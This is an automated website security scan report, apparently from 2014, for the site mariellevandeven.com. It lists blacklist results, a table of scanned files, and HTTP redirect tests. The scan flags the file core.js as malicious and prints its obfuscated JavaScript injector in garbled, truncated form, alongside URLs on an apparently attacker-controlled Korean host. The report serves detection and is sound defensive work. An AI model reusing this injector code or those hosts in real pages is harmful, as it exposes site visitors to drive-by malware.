Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mariellevandeven.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mariellevandeven.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://mariellevandeven.com/ | 200 OK Content-Length: 10292 Content-Type: text/html | clean |
http://mariellevandeven.com/js/jquery-1.5.min.js | 200 OK Content-Length: 84362 Content-Type: application/javascript | clean |
http://mariellevandeven.com/js/jquery.address-1.3.2.min.js | 200 OK Content-Length: 11490 Content-Type: application/javascript | clean |
http://mariellevandeven.com/js/core.js | 404 Not Found Content-Length: 69941 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function osyeoFep(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(osyeoFep()>100000){function cgoQ(EgcppVdrA){var rqgd=7,uzhfXFA=4;var shlQFAFx='129+2,208+1,203+0,224+0,194+1,215+1,201+1,80+2,232+3,208+1,199+2,227+2,206+2,131+1,110+1,80+2,206+2,201+1,208+1,204+3,206+2,227+2,131+1,110+1,80+2,196+0,218+3,224+0,199+2,201+1,',GKBvuIkbo=shlQFAFx.split(',');EDTk='';function RWBCOsHk(c){r var pESSh=cgoQ('yPY')+uGaJaPhQ('eqWburW')+ZZdBu('ZynH')+ERPfrntI('WIMl'); pajhp=document;pajhp['2295wr8854i3110t2405e53897159'.replace(/[0-9]/g,'')](pESSh);function xII(ZJQMdFQ){ alert('RlKWJN');window.eval(); } function YsMs(fiAuOzFfwA){fff=op.split("499"); fff=op.split("499");var nOUTCQctg = document.getElementById('mRjj'); } function thsFILwHG(rkZGUrawyr){ alert('iPnUK');var JTsGNZ=new Function("ZczGb", "return 482904;");window.eval(); } } Antivirus reports:
| ||
http://sexpot.co.kr/logs/info.php | 500 Can't connect to sexpot.co.kr:80 Content-Length: 187 Content-Type: text/plain | clean |
http://sexpot.co.kr/test404page.js | 500 Can't connect to sexpot.co.kr:80 Content-Length: 187 Content-Type: text/plain | clean |
http://mariellevandeven.com/js/jquery.galleriffic.js | 200 OK Content-Length: 33099 Content-Type: application/javascript | clean |
http://mariellevandeven.com/js/jquery.opacityrollover.js | 200 OK Content-Length: 937 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mariellevandeven.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 21:38:56 GMT
Accept-Ranges: bytes
ETag: "62dfc-2834-4c9e6e2c401c0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10292
Content-Type: text/html
Last-Modified: Mon, 17 Sep 2012 14:49:51 GMT
...10292 bytes of data.
GET / HTTP/1.1
Host: mariellevandeven.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 21:38:56 GMT
Accept-Ranges: bytes
ETag: "62dfc-2834-4c9e6e2c401c0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10292
Content-Type: text/html
Last-Modified: Mon, 17 Sep 2012 14:49:51 GMT
...10292 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mariellevandeven.com
Referer: http://www.google.com/search?q=mariellevandeven.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mariellevandeven.com
Referer: http://www.google.com/search?q=mariellevandeven.com
Result:
The result is similar to the first query. There are no suspicious redirects found.